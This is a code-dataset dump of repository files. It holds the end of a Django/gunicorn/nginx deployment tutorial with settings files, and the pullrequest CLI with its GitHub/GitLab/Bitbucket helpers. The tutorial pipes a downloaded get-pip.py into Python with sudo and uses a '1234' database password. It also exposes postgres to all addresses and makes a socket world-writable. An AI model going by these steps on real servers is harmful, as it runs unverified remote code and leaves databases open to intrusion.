capitalization).\n1. (Professional edition of PyCharm only) To run `manage.py` tasks, go to settings | Languages and Frameworks | Django and specify your settings file (in this case development, which includes base). Then you can use Tools | Run manage.py Task (`CTRL` + `ALT` + `R`) to run tasks like `migrate`.\n1. Each time after you made changes in your models in models.py, run `makemigrations` and `migrate` to apply the changes to the database. Do that now.\n1. Also as `manage.py` task, run `createsuperuser --username myname` to create a superuser (for example you) for your website backend.\n1. Use the run configuration you made or run `runserver`.\n1. Access the backend by navigating to [http://127.0.0.1:8000/admin](http://127.0.0.1:8000/admin)\n\n(tip) If you already have a local website running, changing the port number allows you to keep things separate.\n\n# Deploying on an Ubuntu server\nThere are a lot of tutorials around, but I have noticed that instructions get obsolete very quickly, so preferably select the latest one you can find which uses exactly all the tools you want. For me that was the one I had to write myself, as below.\n\nWe will use a **postgres** database, **gunicorn** to serve the website, and **nginx** to 'reverse proxy' requests from outside to gunicorn.\nIt makes life easier if you also use **PyCharm**, and **supervisor** to manage gunicorn.\n\n## Buy the necessary services\n\n1. You will want to buy a VPS, which is a (virtual) server on which you can install whatever you want. Make sure not to buy something called 'shared hosting' as it probably means you can only upload static files. At the moment a VPS can be as cheap as five euros a month.\n1. If, when buying a VPS, you can choose between a pre-installed or ISO-VPS, choose the ISO-VPS, i.e. choose the option with the most freedom (avoid 'time-saving' options).\n1. For this tutorial we will assume you have chosen the latest Ubuntu version, this tutorial is tested with Ubuntu 16.04 and 18.04.\n1. If you don't have a domain yet, you can probably buy it via the same company as you bought the VPS. If you have one, you can probably transfer the management of it to that company. You could also leave it as you have it, and just point the DNS to the ip address of the VPS.\n\nFrom now on we assume that the server is already up and running and that you can execute `sudo` commands via SSH, for example using `ssh [email protected]` in bash.\nIf not, for example because you have walked through the Ubuntu installation yourself, make sure you install `openssh-server` (with `sudo apt install openssh-server`).\nIf you cannot access because you have no root password, you should have created an other user, say `eve`.\nThen you should be able to login with `eve` instead of `root`.\n\nRun `sudo apt update` and `sudo apt upgrade` before anything.\nRandom remark: note that `apt` is the user command, `apt-get` is the low-level command useful for scripting.\n\n## Setting up users and login\n\n1. If you already have a second user besides root, skip this step. Otherwise, log in via SSH with the root user. Create a new user with your name with `adduser eve`. Give her root permissions with `usermod -aG sudo eve`. Impersonate her with `sudo su - eve`. Note you have to do this and the next three instructions (adding a public key) for every user you want to give access to the server.\n1. Set up login with a key pair, if needed on your local computer generate keys with `ssh-keygen -t rsa`, otherwise reuse the key you have. View your public key by executing (locally) in bash `cat ~/.ssh/id_rsa.pub` and copy *all* of the output. \n1. To put it on the server, use `mkdir ~/.ssh` to create the directory, `chmod 700 ~/.ssh` to change permissions, `nano ~/.ssh/authorized_keys` (nano is a text editor, you can also use vim) to put the key in this file and `chmod 600 ~/.ssh/authorized_keys`.\n1. Test that it works by opening a new bash window and check that you can login with eve without needing to enter your password.\n\n## Firewall and fail2ban\n1. Install a firewall, `sudo apt install ufw`.\n1. Allow SSH (22), Postgres (5432), http (80) and https (443) and other things you can think of: `sudo ufw allow xxx` where `xxx` is a port number.\n1. `sudo ufw enable` and check with `sudo ufw status`.\n1. Before closing your existing connection to the server, check if you can login to a new session! Otherwise you could lock yourself out.\n1. Besides a firewall, you also want to protect your server against bots that repeatedly try to guess your password, for that you can install `sudo apt install -y fail2ban`.\n1. Create a new file `sudo nano /etc/fail2ban/jail.local` and put into it\n```\n[sshd]\nenabled = true\nport = 22\nfilter = sshd\nlogpath = /var/log/auth.log\nmaxretry = 3\n```\n1. Start and enable (start on boot) the service with `sudo systemctl start fail2ban` and `sudo systemctl enable fail2ban`.\n\n## Local setup\n1. Add your server to PyCharm in Settings | Build, Execution, Deployment | Deployment, click on the plus icon, choose SFTP, enter the IP address of your server in SFTP host, specify user name, choose as authentication Key Pair and specify your key file, for Windows probably in `C:\\Users\\username\\.ssh\\id_rsa` or on Linux `/home/username/.ssh/id_rsa`. Also, if not already done, specify web server url as `http://myipadress`. \n 1. If you get the error 'Keypair is corrupt or has unknown format', then try selecting OpenSSH config as Authentication instead.\n 1. If you then still cannot make a connection, use password authentication.\n1. Make the server the default one by clicking an icon a few to the right of the 'plus' you used to add the server. When the server name becomes bold, you have set it as default.\n1. Go to Settings | Tools | SSH Terminal and select the server as Deployment server.\n1. You should now be able to ssh into your server with Tools | Start SSH Session (assigning a shortcut to this is a good idea: go to Settings | Keymap, search for 'start ssh' and add a shortcut, e.g. <kbd>Alt</kbd>+<kbd>S</kbd>).\n\n1. If needed (and if you already want your website domain to point to this VPS) point your (sub)domain to the ip address of your server, probably in the settings of the provider where you registered the domains. This can take a few hours to take effect.\n\n1. Install the packages we need with `sudo apt install python3-pip python3-dev libpq-dev postgresql postgresql-contrib nginx`.\n\n## <a name=\"postgres\">Setting up postgres</a>\n1. Start a postgres session with `sudo -u postgres psql`.\n1. `CREATE DATABASE mysite_db;`\n1. `CREATE USER mysite WITH PASSWORD '1234';`\n1. `ALTER ROLE mysite SET client_encoding TO 'utf8';`\n1. `ALTER ROLE mysite SET default_transaction_isolation TO 'read committed';`\n1. Now check if the timezone in `settings/base.py` is correct, if not you can modify it to for example `Europe/Amsterdam`. Then `ALTER ROLE mysite SET timezone TO 'Europe/Amsterdam';`\n1. `GRANT ALL PRIVILEGES ON DATABASE mysite_db TO mysite;`\n1. If you want to use tests which use the database (recommended, see https://docs.djangoproject.com/en/2.2/topics/testing/overview/) you also need to run `ALTER USER mysite CREATEDB;`\n1. `\\q` to exit\n1. Update the production database settings in `mysite/settings/production.py`\n1. Generate a new secret key to enter in the same file. For example using PyCharm's Python console with\n```python\nfrom django.utils.crypto import get_random_string\n\nchars = 'abcdefghijklmnopqrstuvwxyz0123456789!@#$%^*(-_=+)'\nprint(get_random_string(50, chars))\n```\n1. Make sure to keep this file secret. Also don't forget to check `DEBUG = False` in here.\n1. While you're there, also add your website domain to `ALLOWED_HOSTS` in the base settings. Be sure to add your server's ip address as well if you want to debug with that!\n1. Lastly, to enable connection from outside, you need to add to `/etc/postgresql/9.5/main/postgresql.conf` just at the end, `listen_addresses = '*'` and in `/etc/postgresl/9.5/main/pg_hba.conf` you need to add `host all all 0.0.0.0/0 md5`.\n1. Restart postgres with `sudo /etc/init.d/postgresql restart`.\n1. If at any time you get the error \n```\npsycopg2.OperationalError: could not connect to server: Connection refused\n\tIs the server running on host \"x.x.x.x\" and accepting\n\tTCP/IP connections on port 5432?\n```\nthen the previous steps could be the problem (or your firewall is still blocking 5432, of course, or ... ).\n\n\n## Setting up a virtual environment\n1. Check that you're running the python 3 version of pip with `pip -V`. If not, try `pip3 -V`. If that works, you have to substitute `pip` with `pip3` from now on.\n1. Similarly, check if you're using python 3 with `python -V`, and if you need `python3` then substitute, or do something else to fix it.\n * If you need Python 3.7 but the Linux distribution you have doesn't have it, you can follow instructions at https://serverfault.com/a/919064/437404 because this will also install pip. Now you will need to use `python3.7` and `pip3.7` instead of `python` and `pip` in any command. Do not remove the default installed python 3.5.\n1. Install the package with `pip install virtualenv`.\n * If this fails because of permissions, ensure ownership of python to install packages with `sudo chown -R eve:eve /usr/local`.\n1. I happen to want my virtual environments in `/opt/` so I do `cd /opt`.\n * (if you are the only person who is ever going to work on it, putting it in `/home/username` would avoid some permission problems)\n1. Make sure you create a virtual environment with the latest python you installed! Creating a virtual environment appears to be very much liable to change with python versions, so if the following steps don't work just search for instructions for your specific environment.\n1. Install venv with `sudo apt install python3-venv`.\n1. I had python 3.5 installed, checked with `python3.5 -V`. Then you should be able to create a virtual environment with `sudo python3.5 -m venv mysite_env`. Same for 3.7 etc.\n * If that does not work, I once solved that under python 3.6 by doing `sudo python3.6 -m venv --without-pip mysite_env`, `source mysite_env/bin/activate`, `sudo apt install curl`, then found out curl doesn't run as sudo so did `sudo bash -c \"curl https://bootstrap.pypa.io/get-pip.py | python\"` then `deactivate`. \n1. Every time you want to do something in your virtual environment, activate it with (change `mysite` to your website name) `source mysite_env/bin/activate`. Do so, now.\n1. Check with `python -V` for correct python version, and `pip -V` for correct pip version in the correct location (should be in the virtual environment).\n * If you did set the virtual environment up without pip, download it with `wget https://bootstrap.pypa.io/get-pip.py`, install with `python3.6 get-pip.py`. \n1. Check with `which pip` and `which python` that everything points inside your virtual environment. If you do need to use for example `python3.6` instead of `python`, remember that or fix the `python` command to avoid mistakes.\n\n## Uploading project\n1. `cd mysite_env` and `sudo mkdir mysite`, then correct ownership with `sudo chown -R eve:eve /opt/`.\n1. In PyCharm, go to the deployment settings of your server as before and edit Root path to the directory you just created, so `/opt/mysite_env/mysite`. Under Mappings, specify `/` as Deployment Path. \n1. Under Options (click on the arrow next to Deployment in the left menu) you can specify to upload changes automatically or if you hit `CTRL+S`. Click Ok.\n1. You don't want to upload everything you have locally to the server, for example it makes no sense to upload files in your local virtual environment. To exclude these paths, go to Settings | Build, Execution, Deployment | Deployment | Excluded Paths and add them, by hitting the plus icon and choosing Local Path.\n * You may notice that if you try to exclude a folder which is marked as Excluded in PyCharm (not excluded from upload, but excluded like not belonging to the project, which you can see as the folder is marked red) then you cannot exclude it from deployment and you will get a message saying 'Local path is out of project'. (Note, however, that sometimes you *can* exclude it even though you get the warning.) This is a bug in PyCharm, vote for it at https://youtrack.jetbrains.com/issue/WI-7367. To exclude these folders for deployment, first unmark them as excluded by right-clicking on them and choosing Mark Directory as | Cancel Exclusion. Now you can exclude them for deployment, and mark them again as excluded after you did that (PyCharm will give an error in the settings but it will still work).\n1. Now theoretically you should be able to upload everything by hitting <kbd>Ctrl</kbd>+<kbd>S</kbd>, but we have found that often this does not work. A more reliable way is to first select your project folder in the project view on the left (probably the topmost folder) and selecting Tools | Deployment | Upload to ..., or using the default shortcut <kbd>Ctrl</kbd>+<kbd>Alt</kbd>+<kbd>Shift</kbd>+<kbd>X</kbd> and choosing your server.\n\n## Installing dependencies\n1. If you need `msqlclient`, first install `sudo apt install python3.5-dev libmysqlclient-dev` which are needed for the `mysqlclient` package.\n1. If you didn't remember, check with `which python` (with virtualenv activated) where your python hides, then in PyCharm go to Settings | Project ... | Project Interpreter and add a new remote one by selecting the gear icon at the top right.\n1. Select SSH Interpreter in the left menu, then Existing Server Configuration, select as Deployment Configuration your server and Move Deployment Server, then select the right path to your python _of the virtual environment_. Also take care to change the Sync paths, of which the remote path probably should be `/` - but make sure to check the Deployment path under Mappings afterwards and reset it to `/`.\n1. PyCharm should warn you about some dependencies from requirements.txt not being installed, do that. Probably PyCharm will also install helper files which can take a long time.\n1. Make sure you have the remote python selected as interpreter, (you can also check for package updates there), now you can just like before hit Tools | Run Manage.py Task and run `makemigrations` and `migrate` but now both with production settings: so `makemigrations --settings=mysite.settings.production` and also for `migrate`.\n1. If that fails, try running these tasks manually, so go to `/opt/mysite_env/mysite` and run `python manage.py makemigrations` and same for `migrate`.\n1. If needed, create superuser just as with local setup, `createsuperuser --username myname`.\n1. Run the manage.py task `collectstatic --settings=mysite.settings.production` to gather static files for nginx to serve.\n1. Double-check that Deployment Settings | Mappings | Deployment Path is set to `/`, PyCharm sometimes resets this. If this is wrong, uploading files won't work properly. \n\n## Setting up gunicorn\n1. We will setup gunicorn such that nginx will be able to redirect requests to gunicorn which is bound to the Django server.\n1. Copy the contents of the [`gunicorn_start`](server%20configuration%20files/gunicorn_start) script in `/opt/mysite_env/bin/` (after changing all the paths, of course), create file with `nano /opt/mysite_env/bin/gunicorn_start` (do not use sudo or FileZilla here) and make sure it has executable permissions with `sudo chmod u+x /opt/mysite_env/bin/gunicorn_start`.\n\n## Setting up supervisor\n1. We use supervisor to manage the starting and stopping of gunicorn. If your server would crash or for whatever reason is restarted, this makes sure to automatically start your website too.\n1. Install with `sudo apt install supervisor`.\n1. Put the file [`mysite.conf`](server%20configuration%20files/mysite.conf) in `sudo nano /etc/supervisor/conf.d/mysite.conf`, make sure it has executable permissions just like with the gunicorn start script.\n1. Every time after you change such a supervisor config file, you have to do `sudo supervisorctl reread` and `sudo supervisorctl update`. Do this now. I gathered things to remember like this [below](#remember).\n1. You can manually restart with `sudo supervisorctl restart mysite`.\n\n## Setting up nginx\n1. Install with `sudo apt install nginx`\n1. If you do not have the folders `/etc/nginx/sites-available/` and `/etc/nginx/sites-enabled`, you can create them and you also need to include them by putting in `/etc/nginx/nginx.conf` at the bottom of the `http` block the following:\n```\ninclude /etc/nginx/conf.d/*.conf;\ninclude /etc/nginx/sites-enabled/*;\n```\nand remove the `server` block in the `http` block.\n1. Edit the content of the [`nginx-config`](server%20configuration%20files/nginx-config) into the file `sudo nano /etc/nginx/sites-available/mysite`. We will set up https later.\n1. Enable your site by making the symbolic link `sudo ln -s /etc/nginx/sites-available/mysite /etc/nginx/sites-enabled/mysite`\n1. Remove the symbolic link to the default config, `sudo rm /etc/nginx/sites-available/default` and `sudo rm /etc/nginx/sites-enabled/default`\n1. Create empty log file `mkdir /opt/mysite_env/mysite/logs/` and `touch /opt/mysite_env/mysite/logs/nginx-access.log`.\n1. Make the socket directory with `mkdir /opt/mysite_env/mysite/run/`.\n1. Create an empty socket file `touch /opt/mysite_env/mysite/run/gunicorn.sock` in the same way, and also `sudo chmod 666 /opt/mysite_env/mysite/run/gunicorn.sock`. If at any time you get the error that this is not a socket, remove it. A socket is just a text file, with the great usefulness of enabling nginx to talk to gunicorn in a language that they both understand.\n1. Make sure the lines in the nginx config which point to the ssl certificates are commented.\n1. Test the syntax of your nginx config file with `sudo nginx -t` and fix any.\n\n1. Make sure you have your ip and domain (without the `http(s)://` prefix, but both with and without the `www.` prefix) in allowed hosts in your Django settings file.\n1. If you will set up https later, you can skip the https section below, but make sure to start nginx in the section after that.\n\n## Setting up HTTPS\nBecause it's not much work and free, just do it. You need to have your domain pointing to your ip address already.\n\n1. You can get an ssl certificate for free, for example from Let's Encrypt. In that case, just follow their [install guide](https://certbot.eff.org/#ubuntuxenial-nginx). \n1. When running certbot, when it asks for domains provide it both with and without the `www.` prefix. If you need to choose, you are not serving files out of a directory on the server. \n1. Either choose in the certbot setup to redirect http to https (in which case you need to add your domain without `www.` prefix to `server_name` in the largest `server ` block) or do this yourself by uncommenting the https-related parts in the `nginx-config`, marked with `# ---- HTTPS setup start/end ----`, and remove the `listen 80;` line.\n1. In any case, make sure the main server block has only one `listen ...` line, one `server_name ...` line etc.\n1. Possibly you need to `sudo fuser -k 80/tcp` to clean things up after setting up https. \n\n## Start nginx\n1. Start nginx with `sudo service nginx start`. Note that if you get `service: command not found` then whenever this tutorial uses `service` like this you need to use `sudo systemctl start nginx` instead. \n1. In the future, restart nginx with `sudo service nginx restart`. \n1. In case that fails, check the logs at `tail /var/log/long.err.log` or `tail /var/log/long.out.log` to view the error.\n1. Try to reach your website. If it doesn't work, try setting `DEBUG = True` in settings and then `sudo supervisorctl restart mysite`, reload page.\n1. If it still does not work, restart both nginx (see above) and gunicorn with `sudo supervisorctl restart mysite`\n\nNow go in your browser to your ip address or domain and you should see your website.\nIf not, check the logs for errors (see [below](#remember)).\n\n### Setting up automatic renewal of https certificates\n1. Check the [certbot user guide](https://certbot.eff.org/docs/using.html#automated-renewals) to see if you got automated renewal out of the box. For Ubuntu version >= 17.10, this should be okay. This means that there is a cronjob that runs twice a day to renew all certificates that are about to expire. All we have to do is restart the nginx server after each renewal.\n1. Run `sudo vim /etc/cron.d/certbot` and append `--renew-hook \"service nginx restart\"` so that the last line looks like `0 */12 * * * root test -x /usr/bin/certbot -a \\! -d /run/systemd/system && perl -e 'sleep int(rand(43200))' && certbot -q renew --renew-hook \"service nginx restart`.\n1. Run `sudo certbot renew --dry-run`, this should simulate renewal. If this succeeds without errors, everything should be okay.\n\nTo renew certificates manually, do `sudo certbot renew`.\n\n## <a name=\"remember\">To remember</a>\n### Django files\nAfter making changes to Django files, run `sudo supervisorctl restart mysite`.\n### Django models\nAfter making changes to Django models, in PyCharm start Tools | Run Manage.py Task and run `makemigrations --settings=mysite.settings.production` and `migrate --settings=mysite.settings.production` (or from the command line, `python3.6 manage.py makemigrations --settings=...`)\n### Static files\nAfter making changes to static files run as manage.py task `collectstatic`. If run from the command line, I think you need to activate the virtual environment first.\n### Supervisor config\nEvery time after you change a supervisor config file in `/etc/supervisor/conf.d/mysite.conf`, you have to do `sudo supervisorctl reread` and `sudo supervisorctl update`.\n### gunicorn start script\nRestart supervisor with `sudo supervisorctl restart mysite`.\n### nginx config\nAfter changing nginx config files in `/etc/nginx/sites-available/mysite`, test syntax with `sudo nginx -t` and run `sudo service nginx restart`.\n### logs\nGeneral logs are viewed with `tail /var/log/long.err.log` or `tail /var/log/long.out.log`, and the nginx log can be found with `tail /opt/mysite_env/mysite/logs/nginx-error.log` as specified in the nginx config file.\n\nIf you get an error and nothing appears in the logs, try setting `DEBUG = True` in settings and then `sudo supervisorctl restart mysite`, reload page.\n"
},
{
"alpha_fraction": 0.6859027147293091,
"alphanum_fraction": 0.6949711441993713,
"avg_line_length": 27.65354347229004,
"blob_id": "7abe0c28b319e2d3e356452a38a182680392fc94",
"content_id": "e1078dcf3766dc050b801ce505c7bd9d92eca4b9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3639,
"license_type": "permissive",
"max_line_length": 115,
"num_lines": 127,
"path": "/mysite/settings/base.py",
"repo_name": "PHPirates/django-template",
"src_encoding": "UTF-8",
"text": "\"\"\"\nDjango settings for django-template project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.11/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.11/ref/settings/\n\"\"\"\n\nimport os\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/\n\nALLOWED_HOSTS = [\n 'localhost',\n '127.0.0.1',\n]\n\n# Application definition\n\nINSTALLED_APPS = [\n 'pages',\n 'tinymce', # Text editor for website backend\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n]\n\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nROOT_URLCONF = 'mysite.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [os.path.join(BASE_DIR, 'templates')],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'mysite.wsgi.application'\n\n# Password validation\n# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.11/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'Europe/Amsterdam'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/dev/howto/static-files/\n\n# Place where the static files will end up after collectstatic.\nSTATIC_ROOT = os.path.join(BASE_DIR, 'static')\n# Place where static files will be served on your website, http://website.com/STATIC_URL/app/style.css for example.\n# In production this will be replaced by the NGINX config file\nSTATIC_URL = '/static/'\n\n# A list of folders where Django will search for additional static files, in addition to\n# each static folder of each app installed.\nSTATICFILES_DIRS = [\n]\n\n# Makes sure Django looks for static files in each static folder in each app\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n)\n\n\nTINYMCE_DEFAULT_CONFIG = {\n 'theme': 'advanced',\n 'relative_urls': False,\n 'width': 800,\n 'height': 400,\n 'content_css': '/static/pages/style.css',\n 'plugins': 'paste',\n 'paste_as_text': True,\n}\n"
},
{
"alpha_fraction": 0.7672955989837646,
"alphanum_fraction": 0.7672955989837646,
"avg_line_length": 25.5,
"blob_id": "ef938c0db48d065a4b6e5e3aec9589e4459e7910",
"content_id": "ebb9745a5028521b093d09c843b9bee5645ef050",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 159,
"license_type": "permissive",
"max_line_length": 66,
"num_lines": 6,
"path": "/pages/admin.py",
"repo_name": "PHPirates/django-template",
"src_encoding": "UTF-8",
"text": "\"\"\" This file is here to register objects with the admin site. \"\"\"\nfrom django.contrib import admin\n\nfrom .models import Article\n\nadmin.site.register(Article)\n"
},
{
"alpha_fraction": 0.8062015771865845,
"alphanum_fraction": 0.8062015771865845,
"avg_line_length": 35.85714340209961,
"blob_id": "970a42e8248502bf07b29819e088d1dedfcd945b",
"content_id": "67c0f8b1951009e60b6f9a4a4c6a4cfba30f7fe2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 258,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 7,
"path": "/server configuration files/gunicorn_start",
"repo_name": "PHPirates/django-template",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\ncd /opt/mysite_env/mysite\nsource ../bin/activate\nexport DJANGO_SETTINGS_MODULE=mysite.settings.production\nexport PYTHONPATH=/opt/mysite_env/mysite:$PYTHONPATH\ngunicorn mysite.wsgi:application --bind=unix:/opt/mysite_env/mysite/run/gunicorn.sock\n"
}
] | 10 |
eerorika/pullrequest
|
https://github.com/eerorika/pullrequest
|
b04025338ad870fb2aebc8f10023a4b3cde404b1
|
4eabc7b61f590c295271fbd380fd24ad66d783c3
|
7c306e7f70ce0728e95791e6a494e9345343e60b
|
refs/heads/master
| 2020-12-10T03:58:43.866394 | 2020-01-31T00:37:55 | 2020-01-31T00:37:55 | 233,496,109 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5788461565971375,
"alphanum_fraction": 0.5846154093742371,
"avg_line_length": 21.60869598388672,
"blob_id": "2f6dc025e57d6b677171c82ee46e7c54877c0c8d",
"content_id": "197fc2308f720d281713a705140c7515f6c34a6a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 520,
"license_type": "permissive",
"max_line_length": 52,
"num_lines": 23,
"path": "/setup.py",
"repo_name": "eerorika/pullrequest",
"src_encoding": "UTF-8",
"text": "from setuptools import setup, find_packages\n\n\nsetup(\n name='pullrequest',\n version='0.1.4',\n author='Eero Rikalainen',\n author_email='[email protected]',\n url='https://github.com/eerorika/pullrequest',\n description='Create pullrequest to git service',\n license='MIT',\n packages=find_packages(),\n install_requires=[\n 'PyGithub',\n 'python-gitlab',\n 'requests_oauthlib',\n ],\n entry_points={\n 'console_scripts': [\n 'pullrequest = pullrequest.cli:main'\n ]\n },\n)\n"
},
{
"alpha_fraction": 0.6192052960395813,
"alphanum_fraction": 0.6197147369384766,
"avg_line_length": 37.490196228027344,
"blob_id": "b8f07e2423ab325bf80a47855834ff1c8bef0c68",
"content_id": "4abedd80277e7edf6f5bfaab1435221f15581099",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3926,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 102,
"path": "/pullrequest/cli.py",
"repo_name": "eerorika/pullrequest",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport argparse\nimport subprocess\nfrom sys import stdout\n\n\ndef main():\n services = {}\n try:\n from pullrequest import gitlab\n services['gitlab'] = gitlab.create\n except ImportError:\n pass\n try:\n from pullrequest import github\n services['github'] = github.create\n except ImportError:\n pass\n try:\n from pullrequest import bitbucket_cloud\n services['bitbucket'] = bitbucket_cloud.create\n except ImportError:\n pass\n default_service = next(iter(services))\n\n try:\n current_branch = subprocess.check_output(['git', 'rev-parse', '--abbrev-ref', 'HEAD'])\\\n .decode(stdout.encoding).strip()\n if ' ' in current_branch:\n current_branch = None\n except subprocess.CalledProcessError:\n current_branch = None\n\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n description='Create pullrequest to git service')\n parser.add_argument('--key', help='private key/token or oauth2 client id')\n parser.add_argument('--secret', help='oauth secret')\n parser.add_argument('--head', default=current_branch, help='Name of args.head branch that is the source of changes')\n parser.add_argument('--base', default='master', help='Name of base branch that is the target of changes')\n parser.add_argument('--title')\n parser.add_argument('--description')\n parser.add_argument('--repository', help='Repository or project slug / name')\n parser.add_argument('--reviewer', nargs='+', help='Users that should be set as reviewer or assignee')\n parser.add_argument('--label', nargs='+', help='Labels to apply (not supported by all services)')\n parser.add_argument('--url', help='Url of the service (not supported by all services)')\n parser.add_argument('--close_source_branch', action='store_true',\n help='Close source branch on merge (not supported by all services)')\n parser.add_argument('--commit', action='store_true', help='Commit all changes')\n parser.add_argument('--remote', default='origin', help='Name of remote repo to push to')\n parser.add_argument('--service', help=', '.join(services.keys()))\n args = parser.parse_args()\n\n if not args.service:\n try:\n remote_url = subprocess.check_output(['git', 'remote', 'get-url', '--push', args.remote])\\\n .decode(stdout.encoding).strip()\n except subprocess.CalledProcessError:\n remote_url = None\n if not args.service:\n if remote_url:\n for service in services.keys():\n if service in remote_url:\n args.service = service\n if not args.service:\n args.service = default_service\n\n if args.service == 'gitlab' and not args.url:\n args.url = 'https://gitlab.com/'\n\n print('Using service <{}>'.format(args.service))\n\n if args.head:\n if current_branch != args.head:\n print('Creating branch <{}>'.format(args.head))\n subprocess.check_call(['git', 'checkout', '-b', args.head])\n else:\n args.head = current_branch\n assert args.head and args.head != args.base\n\n if args.commit:\n print('Committing changes')\n subprocess.check_call(['git', 'commit', '-a', '-m', args.title])\n elif not args.title:\n try:\n args.title = subprocess.check_output(['git', 'log', '-1', '--pretty=%B']).decode(stdout.encoding).strip()\n except subprocess.CalledProcessError:\n pass\n\n print('Pushing branch <{}> to remote <{}>'.format(args.head, args.remote))\n subprocess.check_call(['git', 'push', '-u', args.remote, args.head])\n\n print('Creating pull request')\n create = services[args.service]\n result = create(**vars(args))\n print(result)\n pass\n\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.6090182662010193,
"alphanum_fraction": 0.6135844588279724,
"avg_line_length": 26.809524536132812,
"blob_id": "6099fb12b5da53e69ae233c4705e5652e7b2cdc4",
"content_id": "fd5e99593e5c7cd8c203c5237d18dfb374730fa8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1752,
"license_type": "permissive",
"max_line_length": 118,
"num_lines": 63,
"path": "/pullrequest/bitbucket_cloud.py",
"repo_name": "eerorika/pullrequest",
"src_encoding": "UTF-8",
"text": "import requests\nfrom requests_oauthlib import OAuth2Session\nfrom oauthlib.oauth2 import BackendApplicationClient\nfrom uuid import UUID\n\nbb_api_root = 'https://api.bitbucket.org'\n\n\ndef create(key, secret, repository, title, description, head, base='master', reviewer=None, close_source_branch=False,\n **_):\n if not reviewer:\n reviewer = []\n auth_headers = bb_authenticate(key, secret)\n reviewer_uuids = [{\n 'uuid': bb_user_to_uuid(auth_headers, r),\n } for r in reviewer]\n payload = {\n 'title': title,\n 'description': description,\n 'source': {'branch': {'name': head}},\n 'destination': {'branch': {'name': base}},\n 'reviewers': reviewer_uuids,\n 'close_source_branch': close_source_branch,\n }\n url = '{}/2.0/repositories/{}/pullrequests'.format(bb_api_root, repository)\n return requests.post(\n url=url,\n json=payload,\n headers=auth_headers,\n ).content\n\n\ndef bb_authenticate(key, secret):\n client = BackendApplicationClient(client_id=key)\n oauth = OAuth2Session(client=client)\n ft = oauth.fetch_token(\n token_url='https://bitbucket.org/site/oauth2/access_token',\n client_id=key,\n client_secret=secret\n )\n at = ft['access_token']\n return {'Authorization': 'Bearer {}'.format(at)}\n\n\ndef bb_user_to_uuid(headers, user):\n if isinstance(user, dict):\n return user['uuid']\n if is_uuid(user):\n return user\n r = requests.get(\n url='{}/2.0/users/{}'.format(bb_api_root, user),\n headers=headers,\n )\n user_info = r.json()\n return user_info['uuid']\n\n\ndef is_uuid(arg):\n try:\n uuid = UUID(arg)\n except ValueError:\n return False\n return arg == uuid\n"
},
{
"alpha_fraction": 0.5951265096664429,
"alphanum_fraction": 0.5960637331008911,
"avg_line_length": 25.674999237060547,
"blob_id": "48810a4c1740f802096774ccf02cf912cfb90728",
"content_id": "0e759f358bf5c5efff7af994861badb808a9f83b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1067,
"license_type": "permissive",
"max_line_length": 110,
"num_lines": 40,
"path": "/pullrequest/gitlab.py",
"repo_name": "eerorika/pullrequest",
"src_encoding": "UTF-8",
